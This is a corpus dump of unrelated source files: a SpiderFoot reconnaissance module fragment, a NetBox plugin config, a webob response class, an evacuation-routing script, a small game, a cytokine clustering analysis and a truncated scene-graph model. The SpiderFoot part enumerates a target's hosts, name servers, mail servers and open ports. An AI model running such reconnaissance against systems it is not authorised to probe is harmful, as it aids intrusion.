) self.errorState = True return if eventData in self.results: self.debug(f"Skipping {eventData}, already checked.") return self.results[eventData] = True res = self.queryDomainDetails(eventData) if not res: self.debug(f"Found no results for {eventData}") return e = SpiderFootEvent("RAW_RIR_DATA", str(res), self.__name__, event) self.notifyListeners(e) hosts = list() name_servers = list() mail_servers = list() for record in res: host = record.get('host') if not host: continue hosts.append(host) dns = record.get('dns') if dns: mx = dns.get('mx') if mx: for mail_server in mx: mail_servers.append(mail_server.rstrip(".")) ns = dns.get('ns') if ns: for name_server in ns: name_servers.append(name_server.rstrip(".")) cname = dns.get('cname') if cname: for c in cname: hosts.append(c.rstrip(".")) network_ports = record.get('network_ports') if network_ports: for port in network_ports: e = SpiderFootEvent("TCP_PORT_OPEN", f"{host}:{port}", self.__name__, event) self.notifyListeners(e) for host in set(mail_servers): if not host: continue hosts.append(host) e = SpiderFootEvent("PROVIDER_MAIL", host, self.__name__, event) self.notifyListeners(e) for host in set(name_servers): if not host: continue hosts.append(host) e = SpiderFootEvent("PROVIDER_DNS", host, self.__name__, event) self.notifyListeners(e) for host in set(hosts): if not host: continue if host in self.results: continue self.results[host] = True if self.getTarget().matches(host, includeChildren=True): evt_type = "INTERNET_NAME" else: evt_type = "AFFILIATE_INTERNET_NAME" if not self.sf.resolveHost(host) and not self.sf.resolveHost6(host): self.debug(f"Host {host} could not be resolved") evt_type += "_UNRESOLVED" evt = SpiderFootEvent(evt_type, host, self.__name__, event) self.notifyListeners(evt) # End of sfp_fullhunt class
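

# --- Editor's addition: hedged illustration, not part of the original SpiderFoot module ---
# parseApiResponse() above expects the dict shape produced by SpiderFoot's
# fetchUrl(): an HTTP status string under 'code' and the raw body under
# 'content'. The payload below is invented purely to show that shape.
if __name__ == "__main__":
    sample_response = {
        "code": "200",
        "content": '{"hosts": [{"host": "www.example.com", "network_ports": [443]}]}',
    }
    # Standalone equivalent of the happy path inside parseApiResponse():
    hosts = json.loads(sample_response["content"]).get("hosts")
    print(hosts)  # [{'host': 'www.example.com', 'network_ports': [443]}]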
the-stack_106_24275
"""Plugin declaration for netbox_onboarding. (c) 2020 Network To Code Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ __version__ = "2.2.1b2" from extras.plugins import PluginConfig class OnboardingConfig(PluginConfig): """Plugin configuration for the netbox_onboarding plugin.""" name = "netbox_onboarding" verbose_name = "Device Onboarding" version = __version__ author = "Network to Code" description = "A plugin for NetBox to easily onboard new devices." base_url = "onboarding" required_settings = [] min_version = "2.8.1" max_version = "3.1.99" default_settings = { "create_platform_if_missing": True, "create_manufacturer_if_missing": True, "create_device_type_if_missing": True, "create_device_role_if_missing": True, "default_device_role": "network", "default_device_role_color": "FF0000", "default_management_interface": "PLACEHOLDER", "default_management_prefix_length": 0, "default_device_status": "active", "create_management_interface_if_missing": True, "skip_device_type_on_update": False, "skip_manufacturer_on_update": False, "platform_map": {}, "onboarding_extensions_map": {"ios": "netbox_onboarding.onboarding_extensions.ios",}, "object_match_strategy": "loose", } caching_config = {} config = OnboardingConfig # pylint:disable=invalid-name
the-stack_106_24276
import json

import webob


class Response:
    def __init__(self):
        self.json = None
        self.html = None
        self.text = None
        self.content_type = None
        self.status_code = 200

    def __call__(self, environ, start_response):
        # Materialize body and content type, then delegate the WSGI call to a
        # real webob.Response.
        self.set_body_and_content_type()

        resp = webob.Response(
            body=self.body,
            content_type=self.content_type,
            status=self.status_code,
        )

        return resp(environ, start_response)

    def set_body_and_content_type(self):
        # Default to an empty body so __call__ works even if no payload
        # attribute was set.
        self.body = b""

        if self.json is not None:
            self.body = json.dumps(self.json).encode()
            self.content_type = "application/json"

        if self.html is not None:
            self.body = self.html.encode()
            self.content_type = "text/html"

        if self.text is not None:
            # webob expects a bytes body, so encode the plain-text payload.
            self.body = self.text.encode()
            self.content_type = "text/plain"
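

# --- Editor's addition: hedged usage sketch, not part of the original module ---
# The Response above is itself a WSGI callable, so it can be exercised with
# webob's Request.blank() test helper; the JSON payload is illustrative.
if __name__ == "__main__":
    from webob import Request

    resp = Response()
    resp.json = {"hello": "world"}

    result = Request.blank("/").get_response(resp)
    print(result.status, result.content_type)  # 200 OK application/json
    print(result.json)                         # {'hello': 'world'}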
the-stack_106_24277
# 1
# Use the CCRP algorithm to find an evacuation plan in the graph of the City of San Francisco.
#
# The source nodes of the plan are the three highway entrances of the city:
# - node 3718987342 (Golden Gate Bridge)
# - node 915248218 (Oakland Bay Bridge)
# - node 65286004 (James Lick Freeway)
#
# The destination nodes correspond to six city hospitals:
# - node 261510687 (San Francisco General Hospital)
# - node 3522821903 (UC Medical Center)
# - node 65319958 (Saint Francis Memorial Hospital)
# - node 65325408 (Saint Mary's Medical Center)
# - node 65295403 (CPMP California Campus)
# - node 258913493 (Kaiser-Permanente Medical Center)
#
# Show the progress of the algorithm in a line chart where the x axis corresponds to capacity and the y axis to travel
# time. The chart must show how capacity and travel time grow as the number of paths inserted into the plan by the
# algorithm grows.

from math import inf

from matplotlib import pyplot as plt

from LibGraph.PIMapDirectGraph import PIMapDirectGraph

input_file = open("SFroad.txt", "r")
for _ in range(1):
    input_file.readline()

g = PIMapDirectGraph()

speed_limits = [30, 50, 50, 70, 70, 90]
capacity_limits = [500, 750, 1000, 1500, 2000, 4000]

source_nodes = {3718987342, 915248218, 65286004}
destination_nodes = {261510687, 3522821903, 65319958, 65325408, 65295403, 258913493}

i = 1
for line in input_file:
    (a, b, c, d) = line.split()
    a = int(a)
    b = int(b)
    c = float(c)
    d = int(d)
    if a != b:
        try:
            g.add_arch(a, b, c / speed_limits[d - 1], capacity_limits[d - 1])
        except KeyError:
            pass

print("Number of nodes:", len(g.get_node_list()))
print("Number of edges:", len(g.get_arch_list()))

plan = g.ccrp(source_nodes, destination_nodes)

print(plan)
print("Number of paths:", len(plan))

# Calculate total capacity of the plan
plan_capacity = sum(c for p, c, t in plan)

# Calculate travel time of the plan
_, _, plan_time = plan[-1]

print("Plan capacity:", plan_capacity)
print("Plan time:", plan_time)

capacities = [0]
for p, c, t in plan:
    capacities.append(c + capacities[-1])
capacities = capacities[1:]

plt.title("Evacuation Plan")
plt.xlabel("Total capacity")
plt.ylabel("Plan travel time")
plt.plot(capacities, [t for p, c, t in plan], "b")
plt.show()

# 2 What is the maximum capacity of vehicles that can enter the city from the three source nodes? What is the maximum
# capacity of vehicles that can reach the six destination hospitals at the same time? Compare these two values with
# the maximum capacity of the plan found with CCRP: where is the bottleneck?

print("Source nodes capacity", sum(g.get_capacity(a, b) for a in source_nodes for b in g.get_out_adj_list(a)))
print("Destination nodes capacity", sum(g.get_capacity(a, b) for b in destination_nodes for a in g.get_in_adj_list(b)))

bottlenecks = list()
for p, c, t in plan:
    bot = inf
    res = None
    for i in range(len(p) - 1):
        if bot > g.get_capacity(p[i], p[i + 1]):
            bot = g.get_capacity(p[i], p[i + 1])
            res = (p[i], p[i + 1])
    bottlenecks.append((res, bot))

print("Bottlenecks:", bottlenecks)

# 3
#
# Briefly explain how you implemented the priority queue in Dijkstra's algorithm used for the shortest-path search.
# What is the complexity of the basic operations of your implementation: queue creation, extract-min, and
# decrease-key?

print("DONE")
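

# --- Editor's addition: hedged aside, not part of the original assignment script ---
# The running capacity total built above can equivalently be produced with
# itertools.accumulate; the toy plan here is invented and independent of the
# real data.
from itertools import accumulate

def _toy_cumulative_capacities():
    toy_plan = [(["a", "b"], 500, 1.2), (["a", "c"], 750, 1.9)]
    return list(accumulate(c for _path, c, _t in toy_plan))  # [500, 1250]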
the-stack_106_24282
from django.utils.html import format_html_join from django.conf import settings from wagtail.core import hooks @hooks.register("insert_editor_js") def editor_js(): js_files = ["js/realtime_preview.js"] return format_html_join( "\n", '<script src="{0}{1}"></script>', ((settings.STATIC_URL, filename) for filename in js_files), )
the-stack_106_24283
# Copyright (C) 2012 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import sys import unittest from blinkpy.common.system.executive_mock import MockExecutive from blinkpy.common.system.output_capture import OutputCapture from blinkpy.common.host_mock import MockHost from blinkpy.web_tests.port import test from blinkpy.web_tests.servers.apache_http import ApacheHTTP class TestApacheHTTP(unittest.TestCase): def test_start_cmd(self): # Fails on win - see https://bugs.webkit.org/show_bug.cgi?id=84726 if sys.platform == 'win32': return def fake_pid(_): host.filesystem.write_text_file('/tmp/WebKit/httpd.pid', '42') return True host = MockHost() host.executive = MockExecutive(should_log=True) test_port = test.TestPort(host) host.filesystem.write_text_file(test_port.path_to_apache_config_file(), '') output_dir = '/mock/output_dir' host.filesystem.maybe_make_directory(output_dir) host.filesystem.maybe_make_directory( '/mock-checkout/out/Release/gen/third_party/devtools-frontend/src/front_end' ) host.filesystem.maybe_make_directory('/mock-checkout/out/Release/gen') server = ApacheHTTP( test_port, output_dir, additional_dirs=[], number_of_servers=4) server._check_that_all_ports_are_available = lambda: True server._is_server_running_on_all_ports = lambda: True server._wait_for_action = fake_pid oc = OutputCapture() try: oc.capture_output() server.start() server.stop() finally: _, _, logs = oc.restore_output() self.assertIn('StartServers 4', logs) self.assertIn('MinSpareServers 4', logs) self.assertIn('MaxSpareServers 4', logs)
the-stack_106_24285
from . base import BaseGame from .. import colors from .. util import srange from random import randint, choice from time import time from .. import font clist = [ colors.Off, colors.Red, colors.Green ] OPEN = 0 FENCE = 1 CLOSED = 2 class Ball(): def __init__(self): self.x = randint(0, 15) self.y = randint(0, 15) self.x_dir = choice([-1, 1]) self.y_dir = choice([-1, 1]) class Field: def __init__(self): self.reset() def reset(self): self.matrix = [[0 for x in range(16)] for y in range(16)] self._reset_visited() def _reset_visited(self): self.__visited = [[False for x in range(16)] for y in range(16)] def print(self): for row in self.matrix: print(row) def get(self, x, y): return self.matrix[y][x] def set(self, x, y, v): self.matrix[y][x] = v def add_fence(self, a, b, balls): xa, ya = a xb, yb = b balls = [(b.x, b.y) for b in balls] if xa == xb: for y in srange(ya, yb): if not (xa, y) in balls: if self.get(xa, y) == OPEN: self.set(xa, y, 1) else: break elif ya == yb: for x in srange(xa, xb): if not (x, ya) in balls: if self.get(x, ya) == OPEN: self.set(x, ya, 1) else: break else: return False return True def _find_group(self, x, y): if self.get(x, y) != OPEN: self.__visited[y][x] = True if self.__visited[y][x]: return [] res = [(x, y)] self.__visited[y][x] = True val = self.get(x, y) if x < 15 and self.get(x + 1, y) == val: res.extend(self._find_group(x + 1, y)) if x > 0 and self.get(x - 1, y) == val: res.extend(self._find_group(x - 1, y)) if y < 15 and self.get(x, y + 1) == val: res.extend(self._find_group(x, y + 1)) if y > 0 and self.get(x, y - 1) == val: res.extend(self._find_group(x, y - 1)) return res def find_groups(self): self._reset_visited() groups = [] for x in range(16): for y in range(16): group = self._find_group(x, y) if len(group) >= 1: group = sorted(group, key=lambda coords: coords[1]) groups.append(group) return groups def percent_open(self): c = 0 for x in range(16): for y in range(16): if self.get(x, y) == OPEN: c += 1 return c / 256 class JezzBall(BaseGame): def setup(self, frames_per_step=5): self.frames_per_step = frames_per_step def reset(self, balls=1): self.win = False self.win_step = 0 self.field = Field() self.balls = [] for _ in range(balls): self.balls.append(Ball()) self._step = 0 def frame(self): self.matrix.clear() if self.win: for x in range(self.win_step): self.matrix.drawLine(x, 0, x, 15, colors.Red) self.matrix.drawText('LVL', x=2, y=0, color=colors.Blue) lvl = '{}'.format(len(self.balls)) w, h = font.str_dim(lvl) x = (16 - w) // 2 self.matrix.drawText(lvl, x=x, y=8, color=colors.Blue) if self._step % 5 == 0: self.win_step += 1 if self.win_step >= 18: self.win = False else: for y in range(16): for x in range(16): self.matrix.set(x, y, clist[self.field.get(x, y)]) # c = colors.hue2rgb((self._step * 2) % 256) c = colors.Blue for b in self.balls: self.matrix.set(b.x, b.y, c) pressed = self.buttons.pressed() if len(pressed) >= 2: if self.field.add_fence(pressed[0], pressed[1], self.balls): groups = self.field.find_groups() for g in groups: close = True for b in self.balls: if (b.x, b.y) in g: close = False break if close: for x, y in g: self.field.set(x, y, CLOSED) if self._step % self.frames_per_step == 0: for b in self.balls: x_dir = b.x_dir y_dir = b.y_dir if b.x == 0: b.x_dir = 1 elif b.x == 15: b.x_dir = -1 elif b.x_dir == 1 and self.field.get(b.x + 1, b.y) != OPEN: b.x_dir = -1 elif b.x_dir == -1 and self.field.get(b.x - 1, b.y) != OPEN: b.x_dir = 1 if b.y == 0: b.y_dir = 1 elif b.y == 15: b.y_dir = -1 elif b.y_dir == 1 and self.field.get(b.x, b.y + 1) 
!= OPEN: b.y_dir = -1 elif b.y_dir == -1 and self.field.get(b.x, b.y - 1) != OPEN: b.y_dir = 1 if (b.x_dir == x_dir and b.y_dir == y_dir) and (b.x != 0 and b.x != 15 and b.y != 0 and b.y != 15): if self.field.get(b.x + b.x_dir, b.y + b.y_dir) != OPEN: b.x_dir *= -1 b.y_dir *= -1 b.x += b.x_dir b.y += b.y_dir if self.field.percent_open() <= 0.10: self.reset(balls=len(self.balls) + 1) self.win = True self._step += 1
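

# --- Editor's addition: hedged usage sketch, not part of the original game module ---
# Exercises the Field helper on its own: a full-height fence splits the 16x16
# grid into two open regions (fence cells are excluded from the groups).
# Assumes srange() from ..util yields an inclusive range between its endpoints.
def _example_field_groups():
    field = Field()
    field.add_fence((4, 0), (4, 15), balls=[])
    groups = field.find_groups()
    return [len(group) for group in groups]  # e.g. [64, 176]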
the-stack_106_24286
import pandas as pd from scipy.cluster import hierarchy from matplotlib import pyplot as plt import seaborn as sns cyt_list = 'IL1B,IL2,IL4,IL5,IL6,IL7,CXCL8,IL10,IL12B,IL13,IL17A,CSF3,CSF2,IFNG,CCL2,CCL4,TNF,IL1RN,IL9,IL15,CCL11,FGF2,CXCL10,PDGFB,CCL5,VEGFA,CCL3'.split(',') #getting df from csv with pre-PL therapy infos df = pd.read_excel('../database/db.xlsx', sheet_name = 'SM NM', usecols = 'A,F:AF,CB,DD') df.columns = ('patient_id,IL1B,IL2,IL4,IL5,IL6,IL7,CXCL8,IL10,IL12B,IL13,IL17A,CSF3,CSF2,IFNG,CCL2,CCL4,TNF,IL1RN,IL9,IL15,CCL11,FGF2,CXCL10,PDGFB,CCL5,VEGFA,CCL3,class_int,cort_therapy').split(',') #This lines were useless, keeping them here fo precaution's sake #replacing NaN values with 1 (no therapy) #df['cort_therapy'].fillna(1, inplace = True) #creating sub-dfs for each class (no therapy before pl) df_ctrl = df[(df['class_int'] == 6)] df_ctrl_filled = df_ctrl.fillna({'cort_therapy' : 1}) df_ctrl_noc = df_ctrl_filled[df_ctrl_filled['cort_therapy'] == 1].dropna() df_pp = df[(df['class_int'] == 5)] df_pp_filled = df_pp.fillna({'cort_therapy' : 1}) df_pp_noc = df_pp_filled[df_pp_filled['cort_therapy'] == 1].dropna() df_sp = df[(df['class_int'] == 4)] df_sp_filled = df_sp.fillna({'cort_therapy' : 1}) df_sp_noc = df_sp_filled[df_sp_filled['cort_therapy'] == 1].dropna() df_rr = df[(df['class_int'] == 3)] df_rr_filled = df_rr.fillna({'cort_therapy' : 1}) df_rr_noc = df_rr_filled[df_rr_filled['cort_therapy'] == 1].dropna() with open('./data/rr_noc_list.txt', 'w') as f: lista_rr = list(df_rr_noc['patient_id'].astype(str)) f.write(','.join(lista_rr)) print('######################################CONTROLLO######################################') print(df_ctrl_noc) #138 print('######################################PP######################################') print(df_pp_noc) #44 print('######################################SP######################################') print(df_sp_noc) #16 print('######################################RR######################################') print(df_rr_noc) #230 #dropping cortisonic therapy from df as it is useless now ctrl_df = df_ctrl_noc.drop(columns = 'cort_therapy') pp_df = df_pp_noc.drop(columns = 'cort_therapy') sp_df = df_sp_noc.drop(columns = 'cort_therapy') rr_df = df_rr_noc.drop(columns = 'cort_therapy') #defining thresholds for low, normal and high level for each cytokine thres = [] #based on quartiles for cyt in cyt_list: thres.append((ctrl_df[cyt].astype(float).quantile(0.25), ctrl_df[cyt].astype(float).quantile(0.75))) #associating the threshold values to each cytokine using a dictionary cyt_thres = dict(zip(cyt_list, thres)) for key in cyt_thres: print('{} - {}'.format(key, cyt_thres[key])) #for each class: #setting low values to -1 #normal values to 0 #high values to 1 pp_values = [] for cyt in cyt_list: arr = list(pp_df[cyt].astype(float)) to_push = [] for entry in arr: if entry < cyt_thres[cyt][0]: entry = -1 elif entry > cyt_thres[cyt][1]: entry = 1 else: entry = 0 to_push.append(entry) pp_values.append(to_push) pp_toclust = pd.DataFrame(pp_values).transpose() pp_toclust.index = list(pp_df['patient_id']) pp_toclust.columns = cyt_list sp_values = [] for cyt in cyt_list: arr = list(sp_df[cyt].astype(float)) to_push = [] for entry in arr: if entry < cyt_thres[cyt][0]: entry = -1 elif entry > cyt_thres[cyt][1]: entry = 1 else: entry = 0 to_push.append(entry) sp_values.append(to_push) sp_toclust = pd.DataFrame(sp_values).transpose() sp_toclust.index = list(sp_df['patient_id']) sp_toclust.columns = cyt_list rr_values = [] for cyt in cyt_list: arr = 
list(rr_df[cyt].astype(float)) to_push = [] for entry in arr: if entry < cyt_thres[cyt][0]: entry = -1 elif entry > cyt_thres[cyt][1]: entry = 1 else: entry = 0 to_push.append(entry) rr_values.append(to_push) rr_toclust = pd.DataFrame(rr_values).transpose() rr_toclust.index = list(rr_df['patient_id']) rr_toclust.columns = cyt_list print(len(rr_toclust)) ##############################################Recursively removing groups################################################## with open('./data/cluster_groups/ward_groups.txt', 'r') as f: groups = [] for line in f: groups.append(line.strip().split(',')) cyt_ord = 'TNF,IL13,IL9,IL1B,IL7,IL4,VEGFA,IL10,CCL11,IL2,IL12B,IL15,PDGFB,IL6,IL17A,CSF2,FGF2,CCL4,CCL3,IFNG,CCL2,CXCL8,CXCL10,IL5,IL1RN,CSF3,CCL5'.split(',') rr_forced = pd.DataFrame() for cyt in cyt_ord: rr_forced[cyt] = rr_toclust[cyt] rr_forced.index = rr_toclust.index clean_groups = [] for group in groups: a = [int(x) for x in group] clean_groups.append(a) clean_groups.pop() i = 1 for group in clean_groups: rr_forced.drop(group, axis = 0, inplace = True) cluster_row = hierarchy.linkage(rr_forced, method="ward", metric="euclidean") clusterfig = sns.clustermap(rr_forced, row_linkage = cluster_row, col_cluster = False, yticklabels = True, figsize = (10, len(rr_forced)/4)) index_row = clusterfig.dendrogram_row.reordered_ind plt.title('RR Clustering') plt.savefig('../plots/remove_clusters/rr_forced_ward_noG{}.png'.format(i), dpi = 300) plt.clf() cluster_row = hierarchy.linkage(rr_forced, method="ward", metric="euclidean") clusterfig = sns.clustermap(rr_forced, row_linkage = cluster_row, col_cluster = False) index_row = clusterfig.dendrogram_row.reordered_ind plt.title('RR Clustering') plt.savefig('../plots/remove_clusters/small_rr_forced_ward_noG{}.png'.format(i), dpi = 300) plt.clf() i +=1
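

# --- Editor's addition: hedged aside, not part of the original analysis script ---
# The low/normal/high coding used above (-1/0/1 against the control-group
# quartiles) can also be expressed with pd.cut; the toy numbers are invented.
# Values exactly equal to Q1 fall in the low bin here, whereas the loops above
# code them as 0 (normal).
import numpy as np

reference = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0])
q1, q3 = reference.quantile(0.25), reference.quantile(0.75)
sample = pd.Series([0.5, 2.5, 9.0])
coded = pd.cut(sample, bins=[-np.inf, q1, q3, np.inf], labels=[-1, 0, 1])
print("Toy quartile coding:", list(coded))  # [-1, 0, 1]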
the-stack_106_24287
""" KERN models """ import numpy as np import torch import torch.nn as nn import torch.nn.parallel from torch.autograd import Variable from torch.nn import functional as F from torch.nn.utils.rnn import PackedSequence from lib.resnet import resnet_l4 from config import BATCHNORM_MOMENTUM from lib.fpn.nms.functions.nms import apply_nms from lib.fpn.box_utils import bbox_overlaps, center_size from lib.get_union_boxes import UnionBoxesAndFeats from lib.fpn.proposal_assignments.rel_assignments import rel_assignments from lib.object_detector import ObjectDetector, gather_res, load_vgg from lib.pytorch_misc import transpose_packed_sequence_inds, to_onehot, arange, enumerate_by_image, diagonal_inds, Flattener from lib.surgery import filter_dets from lib.fpn.roi_align.functions.roi_align import RoIAlignFunction from lib.ggnn import GGNNObj, GGNNRel MODES = ('sgdet', 'sgcls', 'predcls') class GGNNObjReason(nn.Module): """ Module for object classification """ def __init__(self, mode='sgdet', num_obj_cls=151, obj_dim=4096, time_step_num=3, hidden_dim=512, output_dim=512, use_knowledge=True, knowledge_matrix=''): super(GGNNObjReason, self).__init__() assert mode in MODES self.mode = mode self.num_obj_cls = num_obj_cls self.obj_proj = nn.Linear(obj_dim, hidden_dim) self.ggnn_obj = GGNNObj(num_obj_cls=num_obj_cls, time_step_num=time_step_num, hidden_dim=hidden_dim, output_dim=output_dim, use_knowledge=use_knowledge, prior_matrix=knowledge_matrix) def forward(self, im_inds, obj_fmaps, obj_labels): """ Reason object classes using knowledge of object cooccurrence """ if self.mode == 'predcls': # in task 'predcls', there is no need to run GGNN_obj obj_dists = Variable(to_onehot(obj_labels.data, self.num_obj_cls)) return obj_dists else: input_ggnn = self.obj_proj(obj_fmaps) lengths = [] for i, s, e in enumerate_by_image(im_inds.data): lengths.append(e - s) obj_cum_add = np.cumsum([0] + lengths) obj_dists = torch.cat([self.ggnn_obj(input_ggnn[obj_cum_add[i] : obj_cum_add[i+1]]) for i in range(len(lengths))], 0) return obj_dists class GGNNRelReason(nn.Module): """ Module for relationship classification. """ def __init__(self, mode='sgdet', num_obj_cls=151, num_rel_cls=51, obj_dim=4096, rel_dim=4096, time_step_num=3, hidden_dim=512, output_dim=512, use_knowledge=True, knowledge_matrix=''): super(GGNNRelReason, self).__init__() assert mode in MODES self.mode = mode self.num_obj_cls = num_obj_cls self.num_rel_cls = num_rel_cls self.obj_dim = obj_dim self.rel_dim = rel_dim self.obj_proj = nn.Linear(self.obj_dim, hidden_dim) self.rel_proj = nn.Linear(self.rel_dim, hidden_dim) self.ggnn_rel = GGNNRel(num_rel_cls=num_rel_cls, time_step_num=time_step_num, hidden_dim=hidden_dim, output_dim=output_dim, use_knowledge=use_knowledge, prior_matrix=knowledge_matrix) def forward(self, obj_fmaps, obj_logits, rel_inds, vr, obj_labels=None, boxes_per_cls=None): """ Reason relationship classes using knowledge of object and relationship coccurrence. 
""" # print(rel_inds.shape) # (num_rel, 3) if self.mode == 'predcls': obj_dists2 = Variable(to_onehot(obj_labels.data, self.num_obj_cls)) else: obj_dists2 = obj_logits if self.mode == 'sgdet' and not self.training: # NMS here for baseline probs = F.softmax(obj_dists2, 1) nms_mask = obj_dists2.data.clone() nms_mask.zero_() for c_i in range(1, obj_dists2.size(1)): scores_ci = probs.data[:, c_i] boxes_ci = boxes_per_cls.data[:, c_i] keep = apply_nms(scores_ci, boxes_ci, pre_nms_topn=scores_ci.size(0), post_nms_topn=scores_ci.size(0), nms_thresh=0.3) nms_mask[:, c_i][keep] = 1 obj_preds = Variable(nms_mask * probs.data, volatile=True)[:,1:].max(1)[1] + 1 else: obj_preds = obj_labels if obj_labels is not None else obj_dists2[:,1:].max(1)[1] + 1 sub_obj_preds = torch.cat((obj_preds[rel_inds[:, 1]].view(-1, 1), obj_preds[rel_inds[:, 2]].view(-1, 1)), 1) obj_fmaps = self.obj_proj(obj_fmaps) vr = self.rel_proj(vr) input_ggnn = torch.stack([torch.cat([obj_fmaps[rel_ind[1]].unsqueeze(0), obj_fmaps[rel_ind[2]].unsqueeze(0), vr[index].repeat(self.num_rel_cls, 1)], 0) for index, rel_ind in enumerate(rel_inds)]) rel_dists = self.ggnn_rel(rel_inds[:, 1:], sub_obj_preds, input_ggnn) return obj_dists2, obj_preds, rel_dists class VRFC(nn.Module): """ Module for relationship classification just using a fully connected layer. """ def __init__(self, mode, rel_dim, num_obj_cls, num_rel_cls): super(VRFC, self).__init__() self.mode = mode self.rel_dim = rel_dim self.num_obj_cls = num_obj_cls self.num_rel_cls = num_rel_cls self.vr_fc = nn.Linear(self.rel_dim, self.num_rel_cls) def forward(self, obj_logits, vr, obj_labels=None, boxes_per_cls=None): if self.mode == 'predcls': obj_dists2 = Variable(to_onehot(obj_labels.data, self.num_obj_cls)) else: obj_dists2 = obj_logits if self.mode == 'sgdet' and not self.training: # NMS here for baseline probs = F.softmax(obj_dists2, 1) nms_mask = obj_dists2.data.clone() nms_mask.zero_() for c_i in range(1, obj_dists2.size(1)): scores_ci = probs.data[:, c_i] boxes_ci = boxes_per_cls.data[:, c_i] keep = apply_nms(scores_ci, boxes_ci, pre_nms_topn=scores_ci.size(0), post_nms_topn=scores_ci.size(0), nms_thresh=0.3) nms_mask[:, c_i][keep] = 1 obj_preds = Variable(nms_mask * probs.data, volatile=True)[:,1:].max(1)[1] + 1 else: obj_preds = obj_labels if obj_labels is not None else obj_dists2[:,1:].max(1)[1] + 1 rel_dists = self.vr_fc(vr) return obj_dists2, obj_preds, rel_dists class KERN(nn.Module): """ Knowledge-Embedded Routing Network """ def __init__(self, classes, rel_classes, mode='sgdet', num_gpus=1, require_overlap_det=True, pooling_dim=4096, use_resnet=False, thresh=0.01, use_proposals=False, use_ggnn_obj=False, ggnn_obj_time_step_num=3, ggnn_obj_hidden_dim=512, ggnn_obj_output_dim=512, use_ggnn_rel=False, ggnn_rel_time_step_num=3, ggnn_rel_hidden_dim=512, ggnn_rel_output_dim=512, use_obj_knowledge=True, use_rel_knowledge=True, obj_knowledge='', rel_knowledge=''): """ :param classes: Object classes :param rel_classes: Relationship classes. 
None if were not using rel mode :param mode: (sgcls, predcls, or sgdet) :param num_gpus: how many GPUS 2 use :param require_overlap_det: Whether two objects must intersect """ super(KERN, self).__init__() self.classes = classes self.rel_classes = rel_classes self.num_gpus = num_gpus assert mode in MODES self.mode = mode self.pooling_size = 7 self.obj_dim = 2048 if use_resnet else 4096 self.rel_dim = self.obj_dim self.pooling_dim = pooling_dim self.use_ggnn_obj=use_ggnn_obj self.use_ggnn_rel = use_ggnn_rel self.require_overlap = require_overlap_det and self.mode == 'sgdet' self.detector = ObjectDetector( classes=classes, mode=('proposals' if use_proposals else 'refinerels') if mode == 'sgdet' else 'gtbox', use_resnet=use_resnet, thresh=thresh, max_per_img=64 ) self.union_boxes = UnionBoxesAndFeats(pooling_size=self.pooling_size, stride=16, dim=1024 if use_resnet else 512) if use_resnet: self.roi_fmap = nn.Sequential( resnet_l4(relu_end=False), nn.AvgPool2d(self.pooling_size), Flattener(), ) else: roi_fmap = [ Flattener(), load_vgg(use_dropout=False, use_relu=False, use_linear=pooling_dim == 4096, pretrained=False).classifier, ] if pooling_dim != 4096: roi_fmap.append(nn.Linear(4096, pooling_dim)) self.roi_fmap = nn.Sequential(*roi_fmap) self.roi_fmap_obj = load_vgg(pretrained=False).classifier if self.use_ggnn_obj: self.ggnn_obj_reason = GGNNObjReason(mode=self.mode, num_obj_cls=len(self.classes), obj_dim=self.obj_dim, time_step_num=ggnn_obj_time_step_num, hidden_dim=ggnn_obj_hidden_dim, output_dim=ggnn_obj_output_dim, use_knowledge=use_obj_knowledge, knowledge_matrix=obj_knowledge) if self.use_ggnn_rel: self.ggnn_rel_reason = GGNNRelReason(mode=self.mode, num_obj_cls=len(self.classes), num_rel_cls=len(rel_classes), obj_dim=self.obj_dim, rel_dim=self.rel_dim, time_step_num=ggnn_rel_time_step_num, hidden_dim=ggnn_rel_hidden_dim, output_dim=ggnn_obj_output_dim, use_knowledge=use_rel_knowledge, knowledge_matrix=rel_knowledge) else: self.vr_fc_cls = VRFC(self.mode, self.rel_dim, len(self.classes), len(self.rel_classes)) @property def num_classes(self): return len(self.classes) @property def num_rels(self): return len(self.rel_classes) def visual_rep(self, features, rois, pair_inds): """ Classify the features :param features: [batch_size, dim, IM_SIZE/4, IM_SIZE/4] :param rois: [num_rois, 5] array of [img_num, x0, y0, x1, y1]. :param pair_inds inds to use when predicting :return: score_pred, a [num_rois, num_classes] array box_pred, a [num_rois, num_classes, 4] array """ assert pair_inds.size(1) == 2 uboxes = self.union_boxes(features, rois, pair_inds) return self.roi_fmap(uboxes) def get_rel_inds(self, rel_labels, im_inds, box_priors): # Get the relationship candidates if self.training: rel_inds = rel_labels[:, :3].data.clone() else: rel_cands = im_inds.data[:, None] == im_inds.data[None] rel_cands.view(-1)[diagonal_inds(rel_cands)] = 0 if self.require_overlap: rel_cands = rel_cands & (bbox_overlaps(box_priors.data, 